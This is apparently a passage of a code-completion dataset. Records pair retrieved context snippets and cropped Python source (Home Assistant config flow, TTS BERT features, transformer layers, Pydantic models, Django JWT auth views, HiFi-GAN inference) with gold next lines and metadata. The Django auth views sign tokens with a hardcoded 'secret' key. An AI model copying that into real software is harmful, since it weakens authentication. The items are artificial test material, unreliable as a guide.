"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_DARK_MODE: Final = \"dark_mode\""
},
{
"identifier": "CONF_STYLE",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_STYLE: Final = \"style\""
},
{
"identifier": "CONF_STYLE_OPTIONS",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_STYLE_OPTIONS: Final = [\n OPTION_STYLE_STD,\n OPTION_STYLE_CONTRAST,\n OPTION_STYLE_YELLOW_RED,\n OPTION_STYLE_SATELLITE\n]"
},
{
"identifier": "CONF_USE_DEPRECATED_FORECAST",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_USE_DEPRECATED_FORECAST: Final = 'use_deprecated_forecast_attribute'"
},
{
"identifier": "CONF_USE_DEPRECATED_FORECAST_OPTIONS",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_USE_DEPRECATED_FORECAST_OPTIONS: Final = [\n OPTION_DEPRECATED_FORECAST_NOT_USED,\n OPTION_DEPRECATED_FORECAST_DAILY,\n OPTION_DEPRECATED_FORECAST_HOURLY\n]"
},
{
"identifier": "CONFIG_FLOW_VERSION",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONFIG_FLOW_VERSION = 3"
},
{
"identifier": "DOMAIN",
"path": "custom_components/irm_kmi/const.py",
"snippet": "DOMAIN: Final = 'irm_kmi'"
},
{
"identifier": "OPTION_DEPRECATED_FORECAST_NOT_USED",
"path": "custom_components/irm_kmi/const.py",
"snippet": "OPTION_DEPRECATED_FORECAST_NOT_USED: Final = 'do_not_use_deprecated_forecast'"
},
{
"identifier": "OPTION_STYLE_STD",
"path": "custom_components/irm_kmi/const.py",
"snippet": "OPTION_STYLE_STD: Final = 'standard_style'"
},
{
"identifier": "OUT_OF_BENELUX",
"path": "custom_components/irm_kmi/const.py",
"snippet": "OUT_OF_BENELUX: Final = [\"außerhalb der Benelux (Brussels)\",\n \"Hors de Belgique (Bxl)\",\n \"Outside the Benelux (Brussels)\",\n \"Buiten de Benelux (Brussel)\"]"
},
{
"identifier": "get_config_value",
"path": "custom_components/irm_kmi/utils.py",
"snippet": "def get_config_value(config_entry: ConfigEntry, key: str) -> Any:\n if config_entry.options and key in config_entry.options:\n return config_entry.options[key]\n return config_entry.data[key]"
}
] | import logging
import async_timeout
import voluptuous as vol
from homeassistant.components.zone import DOMAIN as ZONE_DOMAIN
from homeassistant.config_entries import ConfigEntry, ConfigFlow, OptionsFlow
from homeassistant.const import ATTR_LATITUDE, ATTR_LONGITUDE, CONF_ZONE
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.selector import (EntitySelector,
EntitySelectorConfig,
SelectSelector,
SelectSelectorConfig,
SelectSelectorMode)
from .api import IrmKmiApiClient
from .const import (CONF_DARK_MODE, CONF_STYLE, CONF_STYLE_OPTIONS,
CONF_USE_DEPRECATED_FORECAST,
CONF_USE_DEPRECATED_FORECAST_OPTIONS, CONFIG_FLOW_VERSION,
DOMAIN, OPTION_DEPRECATED_FORECAST_NOT_USED,
OPTION_STYLE_STD, OUT_OF_BENELUX)
from .utils import get_config_value | 1,557 | """Config flow to set up IRM KMI integration via the UI."""
_LOGGER = logging.getLogger(__name__)
class IrmKmiConfigFlow(ConfigFlow, domain=DOMAIN):
VERSION = CONFIG_FLOW_VERSION
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow:
"""Create the options flow."""
return IrmKmiOptionFlow(config_entry)
async def async_step_user(self, user_input: dict | None = None) -> FlowResult:
"""Define the user step of the configuration flow."""
errors = {}
if user_input:
_LOGGER.debug(f"Provided config user is: {user_input}")
if (zone := self.hass.states.get(user_input[CONF_ZONE])) is None:
errors[CONF_ZONE] = 'zone_not_exist'
# Check if zone is in Benelux
if not errors:
api_data = {}
try:
async with async_timeout.timeout(10):
api_data = await IrmKmiApiClient(
session=async_get_clientsession(self.hass)).get_forecasts_coord(
{'lat': zone.attributes[ATTR_LATITUDE],
'long': zone.attributes[ATTR_LONGITUDE]}
)
except Exception:
errors['base'] = "api_error"
if api_data.get('cityName', None) in OUT_OF_BENELUX:
errors[CONF_ZONE] = 'out_of_benelux'
if not errors:
await self.async_set_unique_id(user_input[CONF_ZONE])
self._abort_if_unique_id_configured()
state = self.hass.states.get(user_input[CONF_ZONE])
return self.async_create_entry(
title=state.name if state else "IRM KMI",
data={CONF_ZONE: user_input[CONF_ZONE],
| """Config flow to set up IRM KMI integration via the UI."""
_LOGGER = logging.getLogger(__name__)
class IrmKmiConfigFlow(ConfigFlow, domain=DOMAIN):
VERSION = CONFIG_FLOW_VERSION
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow:
"""Create the options flow."""
return IrmKmiOptionFlow(config_entry)
async def async_step_user(self, user_input: dict | None = None) -> FlowResult:
"""Define the user step of the configuration flow."""
errors = {}
if user_input:
_LOGGER.debug(f"Provided config user is: {user_input}")
if (zone := self.hass.states.get(user_input[CONF_ZONE])) is None:
errors[CONF_ZONE] = 'zone_not_exist'
# Check if zone is in Benelux
if not errors:
api_data = {}
try:
async with async_timeout.timeout(10):
api_data = await IrmKmiApiClient(
session=async_get_clientsession(self.hass)).get_forecasts_coord(
{'lat': zone.attributes[ATTR_LATITUDE],
'long': zone.attributes[ATTR_LONGITUDE]}
)
except Exception:
errors['base'] = "api_error"
if api_data.get('cityName', None) in OUT_OF_BENELUX:
errors[CONF_ZONE] = 'out_of_benelux'
if not errors:
await self.async_set_unique_id(user_input[CONF_ZONE])
self._abort_if_unique_id_configured()
state = self.hass.states.get(user_input[CONF_ZONE])
return self.async_create_entry(
title=state.name if state else "IRM KMI",
data={CONF_ZONE: user_input[CONF_ZONE], | CONF_STYLE: user_input[CONF_STYLE], | 2 | 2023-12-17 16:35:01+00:00 | 2k |
v3ucn/Bert-vits2-V2.2 | oldVersion/V210/text/japanese_bert.py | [
{
"identifier": "config",
"path": "config.py",
"snippet": "class Resample_config:\nclass Preprocess_text_config:\nclass Bert_gen_config:\nclass Emo_gen_config:\nclass Train_ms_config:\nclass Webui_config:\nclass Server_config:\nclass Translate_config:\nclass Config:\n def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n transcription_path: str,\n cleaned_path: str,\n train_path: str,\n val_path: str,\n config_path: str,\n val_per_lang: int = 5,\n max_val_total: int = 10000,\n clean: bool = True,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n use_multi_device: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n use_multi_device: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n env: Dict[str, any],\n base: Dict[str, any],\n model: str,\n num_workers: int,\n spec_cache: bool,\n keep_ckpts: int,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n device: str,\n model: str,\n config_path: str,\n language_identification_library: str,\n port: int = 7860,\n share: bool = False,\n debug: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self, models: List[Dict[str, any]], port: int = 5000, device: str = \"cuda\"\n ):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, app_key: str, secret_key: str):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, config_path: str):"
},
{
"identifier": "text2sep_kata",
"path": "oldVersion/V210/text/japanese.py",
"snippet": "def text2sep_kata(text: str) -> (list, list):\n parsed = pyopenjtalk.run_frontend(text)\n\n res = []\n sep = []\n for parts in parsed:\n word, yomi = replace_punctuation(parts[\"string\"]), parts[\"pron\"].replace(\n \"’\", \"\"\n )\n if yomi:\n if re.match(_MARKS, yomi):\n if len(word) > 1:\n word = [replace_punctuation(i) for i in list(word)]\n yomi = word\n res += yomi\n sep += word\n continue\n elif word not in rep_map.keys() and word not in rep_map.values():\n word = \",\"\n yomi = word\n res.append(yomi)\n else:\n if word in _SYMBOL_TOKENS:\n res.append(word)\n elif word in (\"っ\", \"ッ\"):\n res.append(\"ッ\")\n elif word in _NO_YOMI_TOKENS:\n pass\n else:\n res.append(word)\n sep.append(word)\n return sep, [hira2kata(i) for i in res], get_accent(parsed)"
}
] | import sys
import torch
from transformers import AutoModelForMaskedLM, AutoTokenizer
from config import config
from .japanese import text2sep_kata | 976 |
LOCAL_PATH = "./bert/deberta-v2-large-japanese-char-wwm"
tokenizer = AutoTokenizer.from_pretrained(LOCAL_PATH)
models = dict()
|
LOCAL_PATH = "./bert/deberta-v2-large-japanese-char-wwm"
tokenizer = AutoTokenizer.from_pretrained(LOCAL_PATH)
models = dict()
| def get_bert_feature(text, word2ph, device=config.bert_gen_config.device): | 0 | 2023-12-18 04:54:46+00:00 | 2k |
NOrangeeroli/SecondPose | model/pcd_cross/modules/transformer/pe_transformer.py | [
{
"identifier": "build_dropout_layer",
"path": "model/pcd_cross/modules/layers/factory.py",
"snippet": "def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module:\n r\"\"\"Factory function for dropout layer.\"\"\"\n if p is None or p == 0:\n return nn.Identity()\n else:\n return nn.Dropout(p=p, **kwargs)"
},
{
"identifier": "AttentionOutput",
"path": "model/pcd_cross/modules/transformer/output_layer.py",
"snippet": "class AttentionOutput(nn.Module):\n def __init__(self, d_model, dropout=None, activation_fn='ReLU'):\n super(AttentionOutput, self).__init__()\n self.expand = nn.Linear(d_model, d_model * 2)\n self.activation = build_act_layer(activation_fn)\n self.squeeze = nn.Linear(d_model * 2, d_model)\n self.dropout = build_dropout_layer(dropout)\n self.norm = nn.LayerNorm(d_model)\n\n def forward(self, input_states):\n hidden_states = self.expand(input_states)\n hidden_states = self.activation(hidden_states)\n hidden_states = self.squeeze(hidden_states)\n hidden_states = self.dropout(hidden_states)\n output_states = self.norm(input_states + hidden_states)\n return output_states"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from ..layers import build_dropout_layer
from .output_layer import AttentionOutput | 1,236 | r"""Vanilla Transformer without positional embeddings.
The shape of input tensor should be (B, N, C). Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class PEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError('`d_model` ({}) must be a multiple of `num_head` ({}).'.format(d_model, num_heads))
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.proj_p = nn.Linear(self.d_model, self.d_model)
self.dropout = build_dropout_layer(dropout)
def forward(
self,
input_q,
input_k,
input_v,
embed_q,
embed_k,
key_masks=None,
attention_factors=None,
):
"""Self-attention with positional embedding forward propagation.
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
embed_q: torch.Tensor (B, N, C)
embed_k: torch.Tensor (B, M, C)
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns:
hidden_states: torch.Tensor (B, C, N)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q) + self.proj_p(embed_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k) + self.proj_p(embed_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class PEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEAttentionLayer, self).__init__()
self.attention = PEMultiHeadAttention(d_model, num_heads, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
input_embeddings,
memory_embeddings,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
input_embeddings,
memory_embeddings,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class PETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None, activation_fn='ReLU'):
super(PETransformerLayer, self).__init__()
self.attention = PEAttentionLayer(d_model, num_heads, dropout=dropout)
| r"""Vanilla Transformer without positional embeddings.
The shape of input tensor should be (B, N, C). Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class PEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError('`d_model` ({}) must be a multiple of `num_head` ({}).'.format(d_model, num_heads))
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.proj_p = nn.Linear(self.d_model, self.d_model)
self.dropout = build_dropout_layer(dropout)
def forward(
self,
input_q,
input_k,
input_v,
embed_q,
embed_k,
key_masks=None,
attention_factors=None,
):
"""Self-attention with positional embedding forward propagation.
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
embed_q: torch.Tensor (B, N, C)
embed_k: torch.Tensor (B, M, C)
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns:
hidden_states: torch.Tensor (B, C, N)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q) + self.proj_p(embed_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k) + self.proj_p(embed_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class PEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEAttentionLayer, self).__init__()
self.attention = PEMultiHeadAttention(d_model, num_heads, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
input_embeddings,
memory_embeddings,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
input_embeddings,
memory_embeddings,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class PETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None, activation_fn='ReLU'):
super(PETransformerLayer, self).__init__()
self.attention = PEAttentionLayer(d_model, num_heads, dropout=dropout) | self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn) | 1 | 2023-12-16 16:58:33+00:00 | 2k |
KatantDev/YMdantic | ymdantic/models/artists/artist.py | [
{
"identifier": "DeprecatedMixin",
"path": "ymdantic/mixins.py",
"snippet": "class DeprecatedMixin:\n \"\"\"Миксин, удаляющий устаревшие поля из модели.\"\"\"\n\n @model_validator(mode=\"before\")\n def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Удаляет устаревшие поля из модели.\n\n :param obj: Словарь с данными модели.\n :return: Словарь с данными модели без устаревших полей.\n \"\"\"\n obj.pop(\"substituted\", None)\n obj.pop(\"deprecation\", None)\n obj.pop(\"decomposed\", None)\n if obj.get(\"version\") is not None:\n obj[\"title\"] += f\" ({obj.get('version')})\"\n obj.pop(\"version\")\n return obj"
},
{
"identifier": "YMBaseModel",
"path": "ymdantic/models/base.py",
"snippet": "class YMBaseModel(BaseModel, ClientMixin):\n \"\"\"Базовая Pydantic модель для всех будущих моделей.\"\"\"\n\n model_config = ConfigDict(\n alias_generator=to_camel,\n populate_by_name=True,\n extra=\"forbid\",\n )"
},
{
"identifier": "Cover",
"path": "ymdantic/models/cover.py",
"snippet": "class Cover(YMBaseModel):\n \"\"\"Pydantic модель, представляющая обложку альбома или артиста.\"\"\"\n\n type: Literal[\"from-artist-photos\", \"from-album-cover\"]\n # Тип обложки. Определяет источник обложки.\n uri: str\n # URI обложки. Это уникальный идентификатор, который можно использовать\n # для получения изображения обложки.\n prefix: str\n # Префикс URI. Используется для формирования полного пути к изображению\n # обложки.\n copyright_name: Optional[str] = None\n # Название правообладателя обложки. Используется очень редко.\n copyright_cline: Optional[str] = None\n # Копирайт обложки. Используется очень редко.\n\n def get_image_url(self, size: str = \"200x200\") -> HttpUrl:\n \"\"\"\n Возвращает URL изображения обложки с заданным размером.\n\n :param size: Размер изображения.\n :return: URL изображения обложки с заданным размером.\n \"\"\"\n return HttpUrl(f\"https://{self.uri.replace('%%', size)}\")"
}
] | from typing import List, Optional, Dict, Any, Literal
from pydantic import model_validator, HttpUrl
from ymdantic.mixins import DeprecatedMixin
from ymdantic.models.base import YMBaseModel
from ymdantic.models.cover import Cover | 899 |
class Artist(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая информацию об артисте."""
id: int
# Уникальный идентификатор артиста.
name: str
# Имя артиста.
various: bool
# Флаг, указывающий, является ли артист группой.
composer: bool
# Флаг, указывающий, является ли артист композитором.
genres: List[str]
# Жанры треков артиста.
disclaimers: List[Literal[""]] # TODO: Проверить, что тут может быть.
# Список отказов от ответственности артиста.
|
class Artist(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая информацию об артисте."""
id: int
    # Unique identifier of the artist.
name: str
    # Name of the artist.
various: bool
    # Flag indicating whether the artist is a group.
composer: bool
    # Flag indicating whether the artist is a composer.
genres: List[str]
    # Genres of the artist's tracks.
    disclaimers: List[Literal[""]]  # TODO: Check what values can appear here.
# Список отказов от ответственности артиста. | cover: Optional[Cover] = None | 2 | 2023-12-21 21:24:10+00:00 | 2k |
MichealCodez/awesome-project-ideas | projects/artisans/backend/authentication/views.py | [
{
"identifier": "RegisterUserSerializer",
"path": "projects/artisans/backend/authentication/serializers.py",
"snippet": "class RegisterUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User # We defined the model to be the User model(default django User model).\n fields = ['id', 'first_name', 'last_name', 'username', 'email', 'password'] # Fields we need to register a user.\n\n # This code snippet is used to make the password field write only(not among user's data that'll be returned) for security reasons.\n extra_kwargs = {\n 'password':{'write_only':True}\n }\n\n # Let us hash the password for security reasons.\n def create(self, validated_data):\n password = validated_data.pop('password', None) # We are getting the password from the validated data.\n instance = self.Meta.model(**validated_data) # We are creating an instance of the User model with the validated data.\n if password is not None:\n instance.set_password(password) # We are hashing the password here.\n instance.save() # We are saving the instance.\n return instance # We are returning the instance."
},
{
"identifier": "ResetPasswordSerializer",
"path": "projects/artisans/backend/authentication/serializers.py",
"snippet": "class ResetPasswordSerializer(serializers.Serializer):\n user = User\n email = serializers.EmailField(required=True)\n new_password = serializers.CharField(max_length=68, required=True)\n confirm_password = serializers.CharField(max_length=68, required=True)"
}
] | from rest_framework.views import APIView
from .serializers import RegisterUserSerializer, ResetPasswordSerializer
from rest_framework.response import Response
from rest_framework.exceptions import AuthenticationFailed
from django.contrib.auth.models import User
from datetime import datetime, timedelta
import jwt | 1,071 |
# This is the view logic for registering a user.
# We defined the class and it inherits from the APIView class.
class RegisterUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
# We defined a serializer variable that takes in the RegisterUserSerializer class and passes in the request data.
serializer = RegisterUserSerializer(data=request.data)
serializer.is_valid(raise_exception=True) # We are checking if the serializer is valid(we raise an exception if it is not valid).
serializer.save() # We save the serializer.
return Response(serializer.data) # We return the serializer data.
# This is the view logic for logging a user in.
class LoginUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
email = request.data['email'] # We are getting the inputted email from the request data.
password = request.data['password'] # We are getting the inputted password from the request data.
# Let's check if the user exists in our database.
user = User.objects.filter(email=email).first()
if user is None:
raise AuthenticationFailed('User not found!')
# Let's check if the password is correct.
if not user.check_password(password):
raise AuthenticationFailed('Incorrect password!')
# Let's create a payload variable that takes in the user's id and the current time.
payload = {
'id':user.id,
'exp':datetime.utcnow() + timedelta(minutes=60),
'iat':datetime.utcnow()
}
# Let's create a token variable that takes in the payload and the secret key.
token = jwt.encode(payload, 'secret', algorithm='HS256')
response = Response()
# We are setting the cookie to the token.
response.set_cookie(key='jwt', value=token, httponly=True)
# We are returning the response data and making sure it is in string format.
response.data = {
'jwt':token.encode('utf8')
}
return response
# This is the view logic to retrieve a user's data using the token.
class UserView(APIView):
def get(self, request):
token = request.COOKIES.get('jwt')
if not token:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the payload from the token.
try:
payload = jwt.decode(token, 'secret', algorithms=['HS256'])
except jwt.ExpiredSignatureError:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the user from the payload.
user = User.objects.filter(id=payload['id']).first()
serializer = RegisterUserSerializer(user)
return Response(serializer.data)
# This is the view logic to logout a user.
class LogoutView(APIView):
def post(self, request):
response = Response()
response.delete_cookie('jwt') # We are deleting the cookie.
# We are returning the response data with a success status message.
response.data = {
'message':'Logout is successful'
}
return response
# This is the logic for resetting a forgotten password.
class ResetPasswordView(APIView):
def post(self, request):
|
# This is the view logic for registering a user.
# We defined the class and it inherits from the APIView class.
class RegisterUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
# We defined a serializer variable that takes in the RegisterUserSerializer class and passes in the request data.
serializer = RegisterUserSerializer(data=request.data)
serializer.is_valid(raise_exception=True) # We are checking if the serializer is valid(we raise an exception if it is not valid).
serializer.save() # We save the serializer.
return Response(serializer.data) # We return the serializer data.
# This is the view logic for logging a user in.
class LoginUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
email = request.data['email'] # We are getting the inputted email from the request data.
password = request.data['password'] # We are getting the inputted password from the request data.
# Let's check if the user exists in our database.
user = User.objects.filter(email=email).first()
if user is None:
raise AuthenticationFailed('User not found!')
# Let's check if the password is correct.
if not user.check_password(password):
raise AuthenticationFailed('Incorrect password!')
# Let's create a payload variable that takes in the user's id and the current time.
payload = {
'id':user.id,
'exp':datetime.utcnow() + timedelta(minutes=60),
'iat':datetime.utcnow()
}
# Let's create a token variable that takes in the payload and the secret key.
token = jwt.encode(payload, 'secret', algorithm='HS256')
response = Response()
# We are setting the cookie to the token.
response.set_cookie(key='jwt', value=token, httponly=True)
# We are returning the response data and making sure it is in string format.
response.data = {
'jwt':token.encode('utf8')
}
return response
# This is the view logic to retrieve a user's data using the token.
class UserView(APIView):
def get(self, request):
token = request.COOKIES.get('jwt')
if not token:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the payload from the token.
try:
payload = jwt.decode(token, 'secret', algorithms=['HS256'])
except jwt.ExpiredSignatureError:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the user from the payload.
user = User.objects.filter(id=payload['id']).first()
serializer = RegisterUserSerializer(user)
return Response(serializer.data)
# This is the view logic to logout a user.
class LogoutView(APIView):
def post(self, request):
response = Response()
response.delete_cookie('jwt') # We are deleting the cookie.
# We are returning the response data with a success status message.
response.data = {
'message':'Logout is successful'
}
return response
# This is the logic for resetting a forgotten password.
class ResetPasswordView(APIView):
def post(self, request): | serializer = ResetPasswordSerializer(data=request.data) | 1 | 2023-12-17 17:21:10+00:00 | 2k |
liuhuang31/hifigan-sr | inference.py | [
{
"identifier": "AttrDict",
"path": "env.py",
"snippet": "class AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self"
},
{
"identifier": "mel_spectrogram",
"path": "meldataset.py",
"snippet": "def mel_spectrogram(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False, training=False):\n # if torch.min(y) < -1.:\n # print('min value is ', torch.min(y))\n # if torch.max(y) > 1.:\n # print('max value is ', torch.max(y))\n if training:\n with torch.no_grad():\n # 16k to 24k/48k\n if fmax <= 8000 and (sampling_rate == 24000 or sampling_rate == 48000):\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 16000)\n y = librosa.resample(y, 16000, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n # 24k to 48k\n elif fmax <= 12000 and sampling_rate == 48000:\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n else:\n pass\n\n global mel_basis, hann_window\n if fmax not in mel_basis:\n mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)\n mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device)\n hann_window[str(y.device)] = torch.hann_window(win_size).to(y.device)\n\n y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect')\n y = y.squeeze(1)\n\n spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[str(y.device)],\n center=center, pad_mode='reflect', normalized=False, onesided=True)\n\n spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9))\n\n spec = torch.matmul(mel_basis[str(fmax)+'_'+str(y.device)], spec)\n spec = spectral_normalize_torch(spec)\n\n return spec"
},
{
"identifier": "MAX_WAV_VALUE",
"path": "meldataset.py",
"snippet": "MAX_WAV_VALUE = 32768.0"
},
{
"identifier": "load_wav",
"path": "meldataset.py",
"snippet": "def load_wav(full_path, sr):\n # sampling_rate, data = read(full_path)\n data, sampling_rate = librosa.load(full_path, mono=True, sr=sr)\n return data, sampling_rate"
},
{
"identifier": "Generator",
"path": "models.py",
"snippet": "class Generator(torch.nn.Module):\n def __init__(self, h):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.conv_pre = weight_norm(Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3))\n resblock = ResBlock1 if h.resblock == '1' else ResBlock2\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n self.ups.append(weight_norm(\n ConvTranspose1d(h.upsample_initial_channel//(2**i), h.upsample_initial_channel//(2**(i+1)),\n k, u, padding=(k-u)//2)))\n\n self.resblocks = nn.ModuleList()\n for i in range(len(self.ups)):\n ch = h.upsample_initial_channel//(2**(i+1))\n for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n\n def forward(self, x):\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i*self.num_kernels+j](x)\n else:\n xs += self.resblocks[i*self.num_kernels+j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print('Removing weight norm...')\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)"
}
] | import glob
import os
import librosa
import argparse
import json
import torch
from scipy.io.wavfile import write
from env import AttrDict
from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav
from models import Generator | 1,598 | from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
